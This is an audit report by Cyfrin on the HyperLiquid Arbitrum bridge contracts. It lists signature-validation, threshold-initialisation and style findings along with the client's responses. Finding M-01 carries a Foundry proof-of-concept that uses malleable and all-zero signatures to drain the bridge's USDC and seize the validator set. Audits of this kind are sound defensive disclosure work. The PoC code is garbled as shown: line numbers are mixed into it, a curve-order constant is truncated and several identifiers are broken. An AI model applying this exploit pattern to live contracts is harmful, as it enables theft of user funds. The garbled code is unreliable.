

HyperLiquid Audit Report

Version 2.0

Cyfrin Hyperliquid Audit Report

Cyfrin.io

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Disclaimer

The Cyfrin team makes every effort to find as many vulnerabilities in the code as possible in the given time but holds no responsibility for the findings in this document. A security audit by the team does not endorse the underlying business or product. The audit was time-boxed to one week, and the review of the code was solely on the security aspects of the solidity implementation of the contracts.

Protocol Summary

The HyperLiquid bridge contract runs on Arbitrum, operating alongside the HyperLiquid L1 which runs tendermint consensus. Validator set updates happen at the end of each epoch, the duration of which still TBD, but likely somewhere between 1 day and 1 week. The contracts currently only support USDC, though the logic extends to support deposits/withdrawals of any other ERC20 token on Arbitrum.

Audit Details

Scope

Between March 16th 2023 - March 20th 2023, the Cyfrin team conducted an audit on the HyperLiquid Bridge.sol and Signature.sol contracts.

Commit hash: e0aff46 of hyperliquid-dex/contracts.

Out of scope The test file example.rs in the tests directory.

Severity Criteria

- High: Assets can be stolen/lost/compromised directly (or indirectly if there is a valid attack path that does not have hand-wavy hypotheticals).
- Medium: Assets not at immediate risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions but external requirements.
- Low: Low impact and low/medium likelihood events where assets are not at risk (or a trivia amount of assets are), state handling might be off, functions are incorrect regarding NatSpec, issues with comments, etc.
- Informational / Non-Critial: A non-security issue, like a suggested code improvement, a comment, a renamed variable, etc. Auditors did not attempt to find an exhaustive list of these.
- Gas: Gas saving/performance suggestions. Auditors did not attempt to find an exhaustive list of these.

Summary of Findings

Finding	Severity	Status
[M-01] Bad signature validation, malleability & lack of zero address protection in updateValidatorSet	М	Resolved
[M-02] Incorrect initialization of powerThreshold and lack of validation	M	Resolved
[L-01] Prevent setting the new epoch to an arbitrary large value	L	Ack
[NC-01] Make minTotalValidatorPower immutable	I	Resolved
[NC-02] Avoid using an initializer unless absolutely necessary	I	Resolved
[NC-03] Use calldata for all function arguments that are not modified	I	Ack
[NC-04] updateValidatorSet block scope is not necessary	I	Resolved
[NC-05] Emit events before interaction	I	Resolved
[NC-06] Make USDC amount naming more verbose	I	Ack
[NC-07] Rename file to Bridge2.sol to match the contract name	I	Resolved
[NC-08] Add missing NatSpec comments to document function parameters and behaviour	I	Ack

Finding	Severity	Status
[NC-09] No need to explicitly initialize variables to 0	I	Resolved
[NC-10] Use addition assignment operator	I	Resolved
[NC-11] Localhost chain id can be 1337 or 31337	I	Resolved
[NC-12] Rename to DOMAIN_SEPARATOR and use block.chainId directly	I	Resolved
[NC-13] Rename to EIP712_DOMAIN_TYPEHASH	I	Resolved
[NC-14] Include byte32 salt in domain typehash	I	Ack
[NC-15] Verifying contract TODO	I	Ack

Medium Findings

[M-01] Bad signature validation, malleability & lack of zero address protection in updateValidatorSet

Description

The ecrecover built-in will return address (0) if it fails to recover the signer from a message digest and corresponding signature. There is no address (0) check in Signature::recoverSigner or Bridge::checkValidatorSignatures.

Anyone can submit bad signatures to steal bridge funds, calling Bridge::withdraw, or take over the bridge as a solitary validator, calling Bridge::updateValidatorSet if the validator set is initialized or updated to be a zero address validator set with threshold power. This is of course highly unlikely as it would not be within the validators' best interest; however, it is still possible and should be mitigated so long as bas signer recovery is an issue.

Additionally, it is possible to call Bridge::withdraw and Bridge::updateValidatorSet using malleable validator signatures. Due to the nature of elliptic curves, it is possible to modify a signature to create another unique signature which recovers to the same signer address. Fortunately, the Bridge::processedWithdrawals mapping and validator (epoch) checkpoints protect against replay. Along with bad signer recovery, this should be mitigated using the OpenZeppelin ECDSA library.

Proof of Concept

The following forge test can be seen to demonstrate these findings:

```
function test_signatureMalleabilityAndBadValidation() public {
2
       address sender = makeAddr("alice");
3
       address pwner = makeAddr("pwner");
4
       uint256 amount = 1e5;
5
       uint256 nonce = 0;
6
       ValidatorSet memory validatorSet = ValidatorSet(0, s_validators,
           s_powers);
7
       Signature[] memory sigs = _getSignatures(sender, amount, nonce);
8
       Signature[] memory sigsCache = sigs;
9
       for (uint256 i = 0; i < sigs.length; ++i) {</pre>
10
           sigs[i].s =
11
                uint256
                   (1157920892373161954235709850086879078528375642790749043826051631415
                    - sigs[i].s;
           sigs[i].v = sigs[i].v == 27 ? 28 : 27;
12
13
       }
14
       console.log("withdrawing with malleable signatures");
15
       vm.startPrank(sender);
16
       bridge.withdraw(amount, nonce, validatorSet, validatorSet.
           validators,sigs);
17
       console.log(
18
           "fortunately, the `processedWithdrawals` mapping and validator(
               epoch) checkpoints protect against replay"
19
       );
20
       vm.expectRevert("Already withdrawn");
       bridge.withdraw(amount, nonce, validatorSet, validatorSet.
           validators, sigsCache);
       ValidatorSet memory newValidatorSet = ValidatorSet(1,
22
           s_newValidators,s_newPowers);
       vm.expectEmit(true, false, false, true);
24
       emit ValidatorSetUpdatedEvent(newValidatorSet.epoch,
           newValidatorSetvalidators, newValidatorSet.powers);
25
       Signature[] memory updateValidatorSigs =
           _getUpdateValidatorSignature(newValidatorSet, s_validatorKeys);
       bridge.updateValidatorSet(newValidatorSet, validatorSet,
           validatorSetvalidators, updateValidatorSigs);
27
       for (uint256 i = 0; i < updateValidatorSigs.length; ++i) {</pre>
           updateValidatorSigs[i].s = uint256(
29
                11579208923731619542357098500868790785283756427907490438260516314151816
           ) - updateValidatorSigs[i].s;
           updateValidatorSigs[i].v = updateValidatorSigs[i].v == 27 ? 28
               : 27;
32
       }
       ValidatorSet memory emptyValidatorSet = ValidatorSet(2,
           s_zeroValidators,s_newPowers);
       bridge.updateValidatorSet(
```

```
emptyValidatorSet, newValidatorSet, newValidatorSet.validators,
               _getUpdateValidatorSignatures(emptyValidatorSet,
               s_newValidatorKeys)
       );
       vm.expectRevert("New validator set epoch must be greater than the
           currentepoch");
       bridge.updateValidatorSet(newValidatorSet, emptyValidatorSet,
           emptyValidatorSet.validators, updateValidatorSigs);
       console.log("but what if validator set is updated to zero
           addressvalidator set with non-zero power?");
40
       address[] memory validatorArr = new address[](1);
41
       validatorArr[0] = PWNER;
42
       uint256[] memory powerArr = new uint256[](1);
43
       powerArr[0] = uint256(1000000);
44
       ValidatorSet memory pwnValidatorSet = ValidatorSet(3, validatorArr,
           powerArr);
45
       Signature[] memory emptySigs = new Signature[](3);
       emptySigs[0] = Signature(0, 0, 0);
46
47
       emptySigs[1] = Signature(0, 0, 0);
       emptySigs[2] = Signature(0, 0, 0);
48
       console.log("anyone can submit bad signatures to steal bridge funds
49
           ");
50
       changePrank(pwner);
51
       emit log_named_uint("bridge balance before", IERC20(USDC_ADDRESS)
           balanceOf(address(bridge)));
       emit log_named_uint("pwner balance before", IERC20(USDC_ADDRESS).
52
           balanceO(pwner));
       bridge.withdraw(IERC20(USDC_ADDRESS).balanceOf(address(bridge)), 0,
53
           emptyValidatorSet, emptyValidatorSet.validators, emptySigs);
54
       emit log_named_uint("pwner balance after", IERC20(USDC_ADDRESS).
           balanceO(pwner));
       emit log_named_uint("bridge balance after", IERC20(USDC_ADDRESS).
55
           balanceO(address(bridge)));
       vm.expectEmit(true, false, false, true);
       emit ValidatorSetUpdatedEvent(pwnValidatorSet.epoch,
           pwnValidatorSetvalidators, pwnValidatorSet.powers);
       bridge.updateValidatorSet(pwnValidatorSet, emptyValidatorSet,
           emptyValidatorSet.validators, emptySigs);
       console.log("or take over the bridge as a solitary validator");
60 }
   function _getUpdateValidatorSignatures(ValidatorSet memory
       newValidatorSet, uint256[] memory currValidatorKeys)
       internal
       view
64
       returns (Signature[] memory)
       Signature[] memory signatures = new Signature[](s_validators.length
           );
       bytes32 newCheckpoint =
69
           keccak256(abi.encode(newValidatorSet.validators,
```

```
newValidatorSetpowers, newValidatorSet.epoch));
        Agent memory agent = Agent("a", newCheckpoint);
bytes32 digest = keccak256(abi.encodePacked("\x19\x01",
70
71
            LOCALHOST_DOMAIN_HASH, hash(agent)));
        for (uint256 i = 0; i < s_validators.length; ++i) {</pre>
72
             (uint8 v, bytes32 r, bytes32 s) = vm.sign(currValidatorKeys[i],
73
                digest);
            signatures[i] = Signature(uint256(r), uint256(s), v);
74
75
        }
76
        return signatures;
77
   }
78
   function _getWithdrawSignatures(address sender, uint256 amount,
       uint256nonce) internal view returns (Signature[] memory) {
79
        Signature[] memory signatures = new Signature[](s_validators.length
        Agent memory agent = Agent("a", keccak256(abi.encode(sender, amount
            ,nonce)));
        bytes32 digest = keccak256(abi.encodePacked("\x19\x01",
81
            LOCALHOST_DOMAIN_HASH, hash(agent)));
82
        for (uint256 i = 0; i < s_validators.length; ++i) {</pre>
             (uint8 v, bytes32 r, bytes32 s) = vm.sign(s_validatorKeys[i],
                digest);
            // console.log("validator: %s", i);
84
            // console.log("v: %s", uint256(v));
85
            // console.log("r: %s", uint256(r));
// console.log("s: %s", uint256(s));
87
            signatures[i] = Signature(uint256(r), uint256(s), v);
89
        }
90
        return signatures;
91 }
```

Impact

Given the vulnerability described has a low likelihood but high impact, we evaluate the severity to MEDIUM.

Recommended Mitigation

As mentioned above, it is recommended to correctly validate recovered signers and protect against signature malleability by using the OpenZeppelin ECDSA library. Additionally, add zero address validation to Bridge::updateValidatorSet to ensure it is not possible to update the validator set to a vulnerable state.

A zero address check has been added to Signature.sol::recoverSigner to address this finding. The client team states that they do not believe this is a feasible exploit since it requires 2/3 of the validators' coordination to perform the bad signature exploit, which only happens when the L1 and bridge's integrity are already compromised, and that it should instead be a low/NC severity issue. The Cyfrin team maintains that this is medium severity in the scope of this audit given its limited scope and context.

[M-02] Incorrect initialization of powerThreshold and lack of validation

Description

The Bridge::powerThreshold should be 2/3 the sum of the validator power across current validators at any point; however, the calculation in Bridge2::constructor is not correct and it's initialized to (2 * _minTotalValidatorPower)/ 3 while it should instead be powerThreshold = (2 * cumulativePower)/ 3;, i.e. use the return value of checkNewValidatorPowers as is the case in Bridge::updateValidatorSet. From the fact that cumulativePower >= minTotalValidatorPower, it means the initialized powerThreshold is less than reasonable. Furthermore, from the communication with the client team, it is understood that minTotalValidatorPower is only used to prevent rounding issues and set once and not changed (immutable). Hence it is likely this value is not likely to be around the actual cumulative power but a lot less than it. Because powerThreshold is initialized to a fairly less value, this can allow malicious actions that are lack of validation power.

Furthermore, the protocol implements admin functionality whereby powerThreshold can be set to an arbitrary value without any validation - this is not recommended and should be subject to the same validation that powerThreshold is at least 2/3 the sum of the total validator power and not over the sum of the total validator power.

Impact

It is possible malicious actions that are lack of validation power are allowed due to wrong initialization of powerThreshold. Because the initializer is assumed to be called by an admin and there is also another admin function to change the powerThreshold, we evaluate the severity to MEDIUM.

Recommended Mitigation

- Initialize powerThreshold to the 2/3 the sum of the initial validator powers.
- Add validation for the new powerThreshold in Bridge::changePowerThreshold() to allow only reasonable values (ranging from 2/3 to total of the current cumulative validation power).

f045dbf Resolution

The calculation now uses the cumulativePower returned from checkNewValidatorPowers to set powerThreshold in the constructor. The client team states that this is also low/NC severity because the initial set of validators is intended to be the team, and future validator updates are not prone to this issue. The Cyfrin team maintains that this is medium severity in the scope of this audit given its limited scope and context.

Low Findings

[L-01] Prevent setting the new epoch to an arbitrary large value

Description

In the function <code>Bridge::updateValidatorSet</code>, the new epoch is checked to be greater than the current epoch. However, there is no check to prevent setting the new epoch to an arbitrary large value which can be used to freeze the protocol. If it is set to <code>type(uint256).max</code> then no more updates are possible.

Impact

This is not likely to happen but we evaluate as LOW because it can freeze the protocol, locking funds and effectively make the whole protocol insolvent.

Recommended Mitigation

It is recommended to allow increase of epoch only to some limited extent, rather than any arbitrary large number.

The client team acknowledges this finding with the following comment:

This does not seem like a useful change to us. This restricts the L1 epoch update logic without any security gains. Maliciously setting the epoch to MAX_INT will indeed lock the smart contract, but that means that the L1 and bridge are already compromised.

Informational/Non-Critical Findings

[NC-01] Make minTotalValidatorPower immutable

Given that Bridge::minTotalValidatorPower is initialized once in the constructor and never modified thereafter, it can be made immutable. This also has the effect of reducing gas usage in functions which currently read its value from storage.

f045dbf Resolution

minTotalValidatorPower is now immutable.

[NC-02] Avoid using an initializer unless absolutely necessary

This comment references the potential introduction of a separate initializer but it should be noted that bad initialization is the cause of many exploits in the wild and so should be avoided wherever possible.

f045dbf Resolution

The comment has been removed.

[NC-03] Use calldata for all function arguments that are not modified

If function arguments are not intended to be modified then it is best practice to pass them as calldata arguments rather than memory, for example in https://github.com/hyperliquid-dex/contracts/blob/e0aff464865aa98c09450702d7fb36b1fcd4508c/Bridge.sol#LL94C48-L94C48.

The client team acknowledges this finding with the following comment:

Through testing we found that using memory seems to require less gas than calldata on Arbitrum, which is why we wrote everything using memory to begin with.

[NC-04] updateValidatorSet block scope is not necessary

The block scope in Bridge::updateValidatorSet is not necessary as the contract successfully compiles without it and so can be removed.

f045dbf Resolution

The block scope has been removed.

[NC-05] Emit events before interaction

To strictly conform to checks-effect-interactions, it is recommended to emit events prior to any external interactions. This is generally advised to ensure correct migration through state reconstruction, which in this case should not be affected given <code>Bridge::deposit</code> is marked as <code>nonReentrant</code>, but it is still good practice.

f045dbf Resolution

Events are now emitted before external interactions.

[NC-06] Make USDC amount naming more verbose

The naming of the USDC amount parameter in Bridge::deposit and Bridge::withdrawis not clear, i.e. change uint256 usdc to uin256 usdc Amount.

f045dbf Resolution

The client team acknowledges this finding with the following comment:

Does not seem like a useful change for us. usdc is clear since its of type uint256, and we use the same convention in the l1 code and solidity event fields

[NC-07] Rename file to Bridge2.sol to match the contract name

The Bridge2 contract resides in Bridge.sol; however, it is best practice to follow the convention of one contract per file with the same name.

f045dbf Resolution

The client team has renamed the contract to Bridge.sol with the following comment:

We call it Bridge2 internally until it replaces the current bridge, at which point we will rename everything to Bridge.

[NC-08] Add missing NatSpec comments to document function parameters and behaviour

It is recommended to document all function behaviours and parameters, especially if they are public-facing.

f045dbf Resolution

The client team acknowledges this finding with the following comment:

Light comments were added to functions in Bridge.sol.

[NC-09] No need to explicitly initialize variables to 0

Variables are initalized to 0 by default in Solidity, so a number of superfluous assignments can be removed.

f045dbf Resolution

Superfluous assignments have been removed.

[NC-10] Use addition assignment operator

The addition assignment operator += can be used when checking new validator powers.

f045dbf Resolution

The addition assignment operator has been used.

[NC-11] Localhost chain id can be 1337 or 31337

The default localhost chain id for some frameworks (e.g. HardHat) is 31337 rather than 1337. For example, it is not possible to run signature tests using forge without changing Signature:: LOCALHOST_CHAIN_ID to 31337.

f045dbf Resolution

This has been resolved by the resolution of NC-12.

[NC-12] Rename to DOMAIN_SEPARATOR and use block.chainId directly

References to *_DOMAIN_HASH in Signature should be renamed to *_DOMAIN_SEPARATOR to be more consistent with the EIP and avoid confusion. Additionally, it is recommended to use block. chainId directly, caching on contract creation and only recomputing the domain separator if the chain id changes, removing the need for multiple different separators to be defined.

f045dbf Resolution

The client team has removed the domain separator contants in favour of a single EIP712_DOMAIN_SEPARATOR constant with the following comment in response to the Cyfrin team's comment about recomputing the domain separator if the chain id changes:

Hard fork concern potentially just an edge case not worth thinking about.

[NC-13] Rename to EIP712_DOMAIN_TYPEHASH

Add an additional underscore for readability.

The constant has been renamed to EIP712_DOMAIN_TYPEHASH.

[NC-14] Include byte32 salt in domain typehash

Per the EIP, bytes32 salt should be added to the domain separator as a last-resort means to distinguish this application from others. Whilst it is unlikely that there would be signatures generated for other contracts that could be replayed onto the bridge, inclusion of a salt gives additional security assurances for little additional overhead.

f045dbf Resolution

The client team acknowledges this finding with the following comment:

We don't think this is a useful change. Since only the validators generate these signatures for the bridge, we do not need to worry about the events being replayed on other smart contracts. Also, including byte32 salt causes problems when generating signatures using the rust client code.

[NC-15] Verifying contract TODO

Update the verifying contract address.

f045dbf Resolution

The client team acknowledges this finding with the following comment:

Removed the TODO. Keeping the verifying address as the zero address, though slightly confusing, is more convenient for us and has no significant drawbacks.